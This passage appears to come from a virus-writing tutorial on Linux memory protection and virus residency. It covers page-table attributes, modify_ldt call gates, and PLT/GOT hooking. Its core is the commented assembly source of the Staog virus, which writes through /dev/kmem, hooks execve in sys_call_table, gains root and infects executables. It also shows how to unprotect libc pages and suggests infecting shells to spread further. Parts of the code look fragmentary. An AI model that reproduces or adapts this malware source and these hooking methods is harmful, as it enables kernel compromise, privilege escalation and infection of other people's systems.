  printk("      u/s:%d      r/w:%d",(((unsigned long) *temp & 0x04)>>2),(((unsigned long) *temp & 0x02)>>1));
  printk("      OS:%x  ",((unsigned long) *temp &0xffff ) >>9 );
  printk("   p:%d\n",((unsigned long) *temp & 0x01));
  if (*temp!=0) {for (z=0;z<4000000;z++){}};    /* slow-down */


void cleanup_module(void)



After the execution of this program we can get the mapped pages in that moment, and the protection attributes of each page.

The first page we would see would be the read-only pages of the process being executed in Ring-3 on the address 8040000 with read only attributes and the user bit, the next ones would be the read/write pages of the executable, with user attributes too. After, in the 40000000 address we would have the library libc mapped in memory in a similar way: first r/w code, and after, some read only pages. When we arrive to the linear address 0xC0000000 we enter the marvelous world of the core, where is mapped all the physical memory of your PC. If it's Pentium or higher, it will use 4M pages. So, if you have 16 megs of RAM, from the 0xC0000000 address, Linux would use 4 entries in the directory table for map those 16 megs, if it would have 32 it would use 8, etc.

This system guides us to make ourselves some questions, like, for example, what would happen if we got 1G of physical memory? In these pages lies the code of the core, aswell as the page table, and surprisingly it lacks of protection via pagination, uses r/w attributes and the user bit for mark the page, so the bad-coded modules that try to overwrite the code of the core would achieve such goal without making any protection fault :)

But that's not all, after map all the physical memory of the machine. It maps some 4Kb pages, all with system attributes, all except one, used for store the IDT (interrupt table) that is the only one with read-only attributes and the S bit, so any bad-coded module that could try to overwrite it, wouldn't achieve that, and would die by a protection fault, and the system would remain stable.

The fact that any Ring-0 process is not able to modify a read-only page is handled by the WP bit of the control register CR4. If that bit is set to 1, then all the Ring-0 processes won't be able to write in read only pages, neither user, neither kernel. If that bit is set to 0, the memory protection works like a 386 and a Ring-0 process can do whatever it wants to, being able to modify all mapped pages, no matter of their protection attributes. So, if a Linux module wants to modify the IDT, will firstly have to deactivate the WP bit of the CR4 reg for be able to write, or modify the page attributes of that page in the page table.

Because all the said, the real mechanism of protection in Linux is the segmentation, and not the pagination as it occurs in Windows NT. If we would have 4G segments, as in NT, and the pagination would be as ids, we would have free access to kernel memory, but this is not the case.

NOTE: Actual versions as 2.2.XX of the core use a protection similar to NT with 4G segments, painfully i haven't been able to look at the page table of that version,but it's a fool thing to think it remains stable

Another possibility of achieve Ring-0 in Linux consist is the call to the system call modify_ldt for generate a CALL GATE. That system call was created for make WINE to be able to emulate windows' memory system, where the user segment descriptors lies at the LDT and not in the GDT, and where it's possible to directionate all the memory with those segments. Generate a CALL GATE with modify_ldt could be possible if we were able to write to every fields of each generated entry, but that's not possible. Firstly, modify_ldt doesn't accepts as an entry an INTEL segment descriptor, it uses this pseudo structure that will be later translated to a descriptor with INTEL format inside the call:

struct modify_ldt_ldt_s {
     unsigned int  entry_number;      /* The entry we wanna modify         */
     unsigned long base_addr;         /* The base address of the segment   */
     unsigned int  limit;             /* The limit of the segment          */
     unsigned int  seg_32bit:1;       /* If its of 16 or 32 bits           */
     unsigned int  contents:2;        /* If its of data, code or stack     */
     unsigned int  read_exec_only:1;  /* Protection attributes             */
     unsigned int  limit_in_pages:1;  
     unsigned int  seg_not_present:1; /* If it's in memory or not          */  
     unsigned int  useable:1;        

If we see the code of the call in /usr/src/linux/arch/i386/kernel/ldt.c, this code shouws us the transformation of that structure to an INTEL descriptor:

       *lp     = ((ldt_info.base_addr & 0x0000ffff) << 16) |
                  (ldt_info.limit & 0x0ffff);
        *(lp+1) = (ldt_info.base_addr & 0xff000000) |
                  ((ldt_info.base_addr & 0x00ff0000)>>16) |
                  (ldt_info.limit & 0xf0000) |
                  (ldt_info.contents << 10) |
                  ((ldt_info.read_exec_only ^ 1) << 9) |
                  (ldt_info.seg_32bit << 22) |
                  (ldt_info.limit_in_pages << 23) |
                  ((ldt_info.seg_not_present ^1) << 15) |

ldt_info is the structure we have passed as a parameter,and *lp is a pointer inside the LDT where resides the segment entry we want to modify. Seeing the structure of an INTEL entry we can see the transformation:

    63-54  55  54  53  52   51-48   47  46-45   44  43-40   39-16 15-0
    base   G   D   R   U    limit   P   DPL      S   type   base  limit
    31-24                   19-16                           23-0  15-0

With the *lp we fill the 32 first bits of the entry, corresponding to the 16 first bits of the limit and the 16 first bits of the base address, and with *(lp+1) we fill the rest of the information. But after make all the operations with ldt_info, there is an OR operation with the 0x7000 constant. Passing this constant to binary we got 0111000000000000, so we know that always the generated descriptors will have the bits 44, 45 and 46 actives. Those bits correspond with the DPL and the S bit. So we could only create user segments. That doesn't matter, because the segment must be of user for allow its execution by an user, But the next bit, the S bit, has a lot of importance. The bit S is 1 when is a normal segment, and is 0 when a segment is of system like the TSS or the CALL GATES, so the generation of CALL GATES is impossible with the modify_ldt function. Modify_ldt also limits the creation of segments of limit over 0xC0000000, thing that would allow to directionate kernel's space. Modify_ldt checks the limit of the segment we want to create with the limits_OK function, and returns a boolean value as it can ve seen in this instruction. Last would be the last accessible byte by the segment, and first the first one, and the constant TASK_SIZE takes the value 0xC0000000.

       return (last >= first && last < TASK_SIZE);

If we can't write in the IDT, the GDT, the LDT, or the page table for jump to Ring-0, and the call modify_ldt is limited for the generation of CALL GATES, another possibility is to use virtual files for access kernel memory. This has a very important problem, and it's that files as /dev/mem and /dev/kmem are only accessed, by default, by the root. However, it's one of the choices more interesting for the creation of global residents under Linux. Staog is one of the few viruses for Linux that uses this method, also it doesn't wait the root to execute it, as it uses 3 different exploits for access /dev/kmem, but the exploit usages limits it's functionality to few kernel versions. The /dev/kmem allows the access of kernel memory, the first byte of that segment is the same of the first byte of kernel's segment or, what it's the same, the linear address 0xC0000000.

.text                                     # This is the code that hooks the
                                          # sys_call to execve
.string "Staog by Quantum / VLAD"      
.global main
        movl %esp,%ebp
        movl $11,%eax                     # Firstly, checks if it's already
        movl $0x666,%ebx                  # resident, calling to execve with
        int $0x80                         # the value 0x666 in EBX, and if it
        cmp $0x667,%ebx                   # is in mem, the virii in mem will
        jnz goresident1                   # return the value 0x667
        jmp tmpend
        movl $125,%eax
        movl $0x8000000,%ebx
        movl $0x4000,%ecx
        movl $7,%edx
        int $0x80

This code is very important, because we call to mprotect for unprotect the memory pages used by the virus. This is done for avoid the modification of the ELF file, and put the data of the virus in a data section and the code in one of code. In this way, we can put all the data of the virus in the same page, and it doesn't matter if the virus is in a code section, at the execution time, it unprotects it.

NOTE: It is only possible to execute mprotect inside the PerProcess memory.

The first it's going to try is to reserve some kernel memory for copy the virus code there, and after will modify the sys_call_table entry that corresponds to the execve for put instead it a pointer to the hooker routine of such function. For reserve memory inside the kernel, it's only possible with kernel internal calls like kmalloc. For be able to execute it, the virus overwrites the system call uname using /dev/kmem, and makes a call to uname with the int 0x80 when it before returning from the interrupt, and it would have already executed the code we used to reserve memory with kmalloc. But before all that, it needs to know uname address. For that, the virus uses the system call get_kernel_syms, with it, it can obtain a list with all the internal Linux functions, and also pointers to structures as the said sys_call_table, that is an array in memory with pointers to the accesible functions with int 0x80, like uname function.

       movl $130,%eax                    # Obtain the number of symbols
        movl $0,%ebx                      # passing in EBX the value 0
        int $0x80                         # Returns in EAX:Number of symbols
        shll $6,%eax          # Make a 6 bit shifting to the left. This is
                              # the same as multiply the symbol number by 64
                              # that are the bytes occupied by each entry
                              # returned by get_kernel_syms
                              # The information obtained is the same that the
                              # located at /proc/ksyms.
                              # 4 bytes with a kernel address and 60 bytes
                              # with symbol's name

        subl %eax,%esp        # Reserve space in the stack
        movl %esp,%esi        # before the call    
                              # the ESI register will point to a mem structure
        pushl %eax
        movl %esi,%ebx        # obtain kernel symbols
        movl $130,%eax
        int $0x80
        pushl %esi      
nextsym1:                     # Here i scan the symbol table in memory
        movl $thissym1,%edi   # seaching the string current (zero-terminated)
        push %esi
        addl $4,%esi
        cmpb $95,(%esi)
        jnz notuscore
        incl %esi
        pop %esi
        jz foundsym1
        addl $64,%esi         # Look how it increments 64 by 64 for make the
        jmp nextsym1          # comparisons
        movl (%esi),%esi
        movl %esi,current           # Store search result in the variable
        popl %esi                   # current

        pushl %esi      
nextsym2:                           # Look also the kmalloc symbol with the
        movl $thissym2,%edi         # same way.
        push %esi
        addl $4,%esi
        pop %esi
        jz foundsym2
        addl $64,%esi
        jmp nextsym2
        movl (%esi),%esi
        movl %esi,kmalloc          # Store search result in the kmalloc var
        popl %esi

        xorl %ecx,%ecx
nextsym:                           # find symbol
        movl $thissym,%edi         # And now sys_call_table address
        movb $15,%cl              
        push %esi
        addl $4,%esi
        pop %esi
        jz foundsym
        addl $64,%esi
        jmp nextsym
        movl (%esi),%esi
        pop %eax
        addl %eax,%esp

        movl %esi,syscalltable    # Store in the syscalltable variable the
        xorl %edi,%edi            # address found.

At this point the virus knows the memory position of the sys_call_table

        movl $devkmem,%ebx           # Open the /dev/kmem file
        movl $2,%ecx                 # EBX = Ptr to string with the name
        call openfile                # ECX = Open way ($2 read/write)
        orl %eax,%eax
        js haxorroot                 # If it couldn't be opened, jumps to a
        movl %eax,%ebx               # routine for access /dev/kmem by means
                                     # of exploits
 # Realize that ESI still have the address of the sys_call_table, and if to
 # that we add 44, we will obtain a pointer to the address where is the ptr
 # to execve inside the sys_call_table

        leal 44(%esi),%ecx           # lseek to sys_call_table[SYS_execve]
        call seekfilestart
        movl $orgexecve,%ecx         # Read pointer'
s value
        movl $4,%edx                 # 4 bytes
        call readfile

        leal 488(%esi),%ecx          # Now move the coresponding entry to
        call seekfilestart           # uname inside the sys_call_table

        movl $taskptr,%ecx           # And read the sys_call_table[SYS_uname]
        movl $4,%edx                 # value, and store it in the var taskptr
        call readfile
        movl taskptr,%ecx            # Move ourselves to the code where is the
        call seekfilestart           # uname function in memory.

        subl $endhookspace-hookspace,%esp
                                     # Reserve space in the stack for the code
                                     # that i'm going to overwrite
        movl %esp,%ecx               # Read the code i'
m going to overwrite
        movl $endhookspace-hookspace,%edx # of uname on the stack
        call readfile
        movl taskptr,%ecx           # Return to the beginning of uname routine
        call seekfilestart

        movl filesize,%eax              
        addl $virend-vircode,%eax
        movl %eax,virendvircodefilesize

 # Now write the routine for reserve memory over uname's code

        movl $hookspace,%ecx    
        movl $endhookspace-hookspace,%edx
        call writefile

        movl $122,%eax             # Make a call to uname, but what'
s really
        int $0x80                  # going to be executed will be our routine
        movl %eax,codeto           # EAX = address we've reserved
        movl taskptr,%ecx          # Go back to uname'
s code
        call seekfilestart

        movl %esp,%ecx                    # And restore the uname's original
        movl $endhookspace-hookspace,%edx # that we had temporally in stack
        call writefile                    # to its original place.
        addl $endhookspace-hookspace,%esp # Remove the memory we had reserved
                                          # in the stack
        subl $aftreturn-vircode,orgexecve      

        movl codeto,%ecx                  # Move now the pointer to the begin
        subl %ecx,orgexecve               # of the mem zone we had reserved
        call seekfilestart

        movl $vircode,%ecx                # And write the virus code in it
        movl $virend-vircode,%edx
        call writefile

        leal 44(%esi),%ecx                # Search the sys_call_table, relative
        call seekfilestart                # to execve, and i modify the orig.
                                          # pointer by our function
        addl $newexecve-vircode,codeto

        movl $codeto,%ecx                 # Write the new ptr in sys_call_table
        movl $4,%edx
        call writefile

        call closefile                    # close /dev/kmem


        call exit

openfile:                       # System calls made with int 0x80
        movl $5,%eax            # EAX = Function to do
        int $0x80               # see /usr/include/sys/syscall.h for a function
        ret                     # list

        movl $6,%eax
        int $0x80

        movl $3,%eax
        int $0x80

        movl $4,%eax
        int $0x80

        movl $19,%eax
        xorl %edx,%edx
        int $0x80

        movl $10,%eax
        int $0x80

        xorl %eax,%eax
        incl %eax
        int $0x80

thissym:                            # Here are defined some variables
.string "sys_call_table"            # See that they'
re in the same section of
                                    # the code. That's why we use mprotect.
.string "current"

.string "kmalloc"

.string "/dev/kmem"

.long 0x666

infect:                                   # Infection routine

       # Here should go the ELF infection routine. It consist in generate a
       # temporal file with the virus code and execute it with execve


.global newexecve
        pushl %ebp
        movl %esp,%ebp                      # In the stack will be all regs,
        pushl %ebx                          # see that we'
re inside an int 0x80
        movl 8(%ebp),%ebx
        cmpl $0x666,%ebx                    # If EBX = 0x666, we return
        jnz notserv                         # 0x667 because it's the residency
        popal                               # mark.
        incl 8(%ebp)                        
        popl %ebx
        popl %ebp
        call ring0recalc                    # Calculate the displacement of
ring0recalc:                                # addresses in memory
        popl %edi
        subl $ring0recalc,%edi
        movl syscalltable(%edi),%ebp        # EBP = Address of sys_call_table
        call saveuids                      
        call makeroot          
        call infect                         # Infect the file
        call loaduids                      
        popl %ebx
        popl %ebp
.byte   0xe9                                # Go to the original execve func.
orgexecve:                                  # 0xE9 is the jump opocode and the
.long   0                                   # next 4 bytes are the  4 bytes
aftreturn:                                  # if the orgexecve variable. The
                                            # equivalent would be jmp orgexecve
.long 0

.long 0

.global hookspace            # This is the routine that reserves memory.
hookspace:                   # Its the one that is overwritten by the virus
        push %ebp            # over uname.
        pushl %ebx
        pushl %ecx
        pushl %edx
        movl %esp,%ebp

        pushl $3
.byte   0x68
.long   0
.byte   0xb8               # movl $xxx,%eax ;0xb8 is the opcode of a movl and
kmalloc:                   # the next bytes correpond with the kmalloc var,
.long   0                  # so, when we find kmalloc in mem, a
        call %eax          # movl $kmalloc,%eax will be generated
                           # and with call %eax we jump to kmalloc for reserve
                           # memory                
        movl %ebp,%esp
        popl %edx
        popl %ecx
        popl %ebx
        popl %ebp      

.global endhookspace
.global virend

Global residency in Ring-3

The base of this method of residency consists in the hook of routines in Ring-3 and that are executed by all the processes.

The code of Ring-3 that can be executed by all the processes are the libraries, in windows are the DLLs.

Windows, for example, distributes its space in 4 arenas, each arena has a different utility and has differend code and data. There is one arena dedicated to DOS that goes from the virtual address 0 to 40000000, another one dedicated to the PerProcess memory, that goes from 40000000 to 80000000, another that handles the shared memory by all the processes that goes from 80000000 to C0000000, and another dedicated to VXD, i.e. kernel's code, that is executed in Ring-0 and goes from C0000000 to FFFFFFFF.

The most important library in windows is the KERNEL32.DLL, and there are the functions of file creation, memory handling, etc. (in linux the equivalent could be the library libc).

The files, instead of execute directly TRAP GATES for make the calls to Ring-0 code, use a dynamic link mechanism for jump to library's code (Ring-3 code) that do the jump to Ring-0 for obtain the desired kernel service. Windows 95 commited a great dessign fail, and it is the fact that it loads the majority of libraries in the shared memory arena (KERNEL32 library is load at BFF70000 address). To locate the most important libraries into a shared memory arena has the advantage that the system doesn't have to load the library with each file that imports calls to that library, because it's in the process memory. This fact also makes possible the hook of system calls without the need of jump to Ring-0. Viruses like Win95.HPS and Win95.K32 use this fact for achieve global residence without jumping to Ring-0. However this is not as easy as it gets, because even if the kernel doesn't have protection by pagination, the files have protection by pagination in the code sections (for handle the try of write into the code sections). However, this could be unprotected easily using VXD calls like _pagemodifypermissions or library calls like memoryprotect.

In Linux we could try to hook functions like execve of the libc library, located from the virtual address 0x40000000. Any try of a program of write to protected pages will mean protection faults, because there is pagination prtoection in the code sections, as in the code sections of the normal executables. But the function mprotect also works with library's code, because these are located below 0xC0000000, in the PerProcess memory. Code as the one that follows allows you to unprotect pages of libraries like libc. As we saw in the introduction, the address of the getpid function of libc its loaded in the address 0x40073000 in my Linux version, so we know that it's a code section, so it would be protected againist write attempts.

       [section .text]
        [extern puts]
        [global main]

main:   pushad
        mov     eax,0125h
        mov     ebx,40073000h
        mov     ecx,02000h
        mov     edx,07h
        int     80h                     ; Call to mprotect
        mov     ebp,40073000h
        xor     eax,eax                 ; Put EAX to 0
        mov     dword [ebp],eax         ; Write EAX value in EBP address
        popad                           ; 0x40073000

Note that this program without using mprotect would generate a general protection fault. Now try to execute simultaneously 2 copies of the program. The first page would unprotect a libc page and modify the first bytes of the call to getpid putting them to 0; the second copy is stopped by gdb in the main position for test what value is in the 0x40073000 address. The value won't be 0, it would be the original value.

This is because Linux doesn't load its libraries in shared arenas, it loads them in the PerProcess memory. But if the PerProcess memory is different for each process, do the libraries get loaded with each executable, occupying unnecessary memory? The answer is NO, the solution is in the copy-on-write mechanism that allows the sharing of read/write memory pages between different processes, when these pages are in the memory of the process. When the program is load in memory, in the 0x40073000 address will be the memory page of the parent program, and if we try to write in it, the system will verify if it's a read/write or read only page. If it's read-only, the system will generate a page fault, and if it's read/write, the OS will generate a copy of that page for the child process, so when the program writes on it, it's really writing to an own page, not to the parent page. This method allows the share of libraries in memory, preserving the security, avoiding undesired attempts of global residency. Linux implements shared memory, but it's only for inteprocess communication mechanisms (IPC).

PerProcess residency

As i explained in the chapter of ELF infection, the ELF format is a very potent format, and between its important funcitonalities resides the dynamic link of functions.

The Linux executables don't usually use the int 0x80, they leave that job to libraries like libc. With the usage of libraries we earn disk space, because that code is not inserted inside the executable each time. But these libraries can be loaded in any address of the PerProcess memory. This makes necessary the existence of one mechanism that allow the call to functions in files or different libraries, this mechanism is the dynamic link.

There are 2 main sections that are there for make the dynamic link of functions. The section .plt (Procedure Linkage Table) and the section .got (Global Offset Table).

Linux's dinamic link system had advantages among all the other systems. The PE format of Windows, for example, has specific sections for the linkage such as the Import Table, in it there are as many entryes as functions imported from libraries, and that references are resolved at load-time. In Linux, however, doesn't resolve them in load-time, it waits for the first execution of a system call for resolve the reference of that function. With the first execution, the program gives the control to the dynamic linker, that is a function inside the library we want to call, then the linker resolves the refernce and puts the absolute address of the system call in a table in memory called .got, so the next functions will jump directly to the function without needing to call previously to the dynamic linker. With that,we make better the system productivity avoiding to have to resolve that memory reference that maybe the executable won't execute. If we disassemble the next executable...

         #include <unistd.h>
          void main()
          getpid();        /* 1st call to getpid */
          getpid();        /* 2nd call to getpid */

We obtain the following assembler code

      0x8048480 <main>:    pushl %ebp
      0x8048481 <main+1>:  movl  %esp,%ebp
      0x8048483 <main+3>:  call  0x8048378 <getpid>
      0x8048488 <main+8>:  call  0x8048378 <getpid>
      0x804848d <main+13>: movl  %ebp,%esp
      0x804848f <main+15>: pop   %ebp
      0x8048490 <main+16>: ret

The calls to GETPID will be built as a jump to an entry in then .plt section, as we can see with the command "info file", the section .plt is mapped between 0x08048368 and 0x080483C8. If we continue tracing inside the .plt code we will see the following code:

      0x8048378 <getpid>:    jmp *0x80494e8
      0x804837e <getpid+6>:  push $0x0
      0x8048383 <getpid+11>: jmp 0x8048368 <_init+8>

This will be the basic structure of a .plt entry. The first jmp will be a jump to the address contained in the address 0x80494E8. This address is part of the .got table, and in the load-time will have the value 0x804837E.

      (gdb)x 0x80494e8
      0x80494e8 <__DTOR_END__+16>:  0x0804837e

As it's the first time we call to GETPID in the executavle, this will have to make a jump to the dynamic linker for obtain the address of the function in the library. For that it makes a push 0x0, where 0x0 is the pointer inside the reloc area that specifies to the dynamic linker what's the .got entry it has to modify. After, it makes a jmp 0x8048368, where 0x8048368 is the address of the first entry of the .plt section. The first entry of the .plt is special, because it's only used for call to the dynamic linker. If we contine debugging, we'll see the structure of the first .plt entry.

      0x8048368 <_init+8>:  pushl 0x80494e0
      0x804836e <_init+14>: jmp   *0x80494e4

Firstly, it puts on stack the value 0x80494E0, that corresponds with the 2nd entry in the .got table, and after it makes a jump to the address contained in 0x80494E4 (the third entry of the .got). The 3 first entries of the .got doesn't contain pointers to the .plt at load-time, they are special entries. The first one contains a pointer to the .dynamic section, and the third one is filled with a pointer to the position of the dynamic linker.

      (gdb)x 0x80494e4
      0x80494e4 <__DTOR_END__+12>: 0x40004180

So if we continue tracing, we'll see the code of the dynamic linker, already in the memory space of the library. When the program returns from the system call, in the .got section corresponding to GETPID, the linker will have put the absolute address of the function. If we continue tracing, in the second call to GETPID, we could see the new value in the .got section.

      (gdb)x 0x80494e8
      0x80494e8 <__DTOR_END__+16>:  0x40073000

so, with the instruction jmp *0x80494E0 we will jump directly to the function without calling to the dynamic linker.

This mechanism allows the hook of system calls inside the memory of the own process, it's the denominated PerProcess residency. A virus with this mechanism can hook, for example, the execve call, modifying the .plt entry that corresponds with that call, exchanging the jmp *address_in_got by a jmp *virus_address. However, the virus, being executed in Ring-3, will have the eternal limitations in the file access, and will be only able to infect the files the user can have access to. Another limitation is that it only hooks system call in contaminated files. Clean files being executed won't have their calls hooked by the virus.

However, the possibilities of this method are really impressive, if a command interpret like bask or sh is infected, then, because they are commands executed by all users, the hook of execve in a PerProcess way could be as effective as a global residency.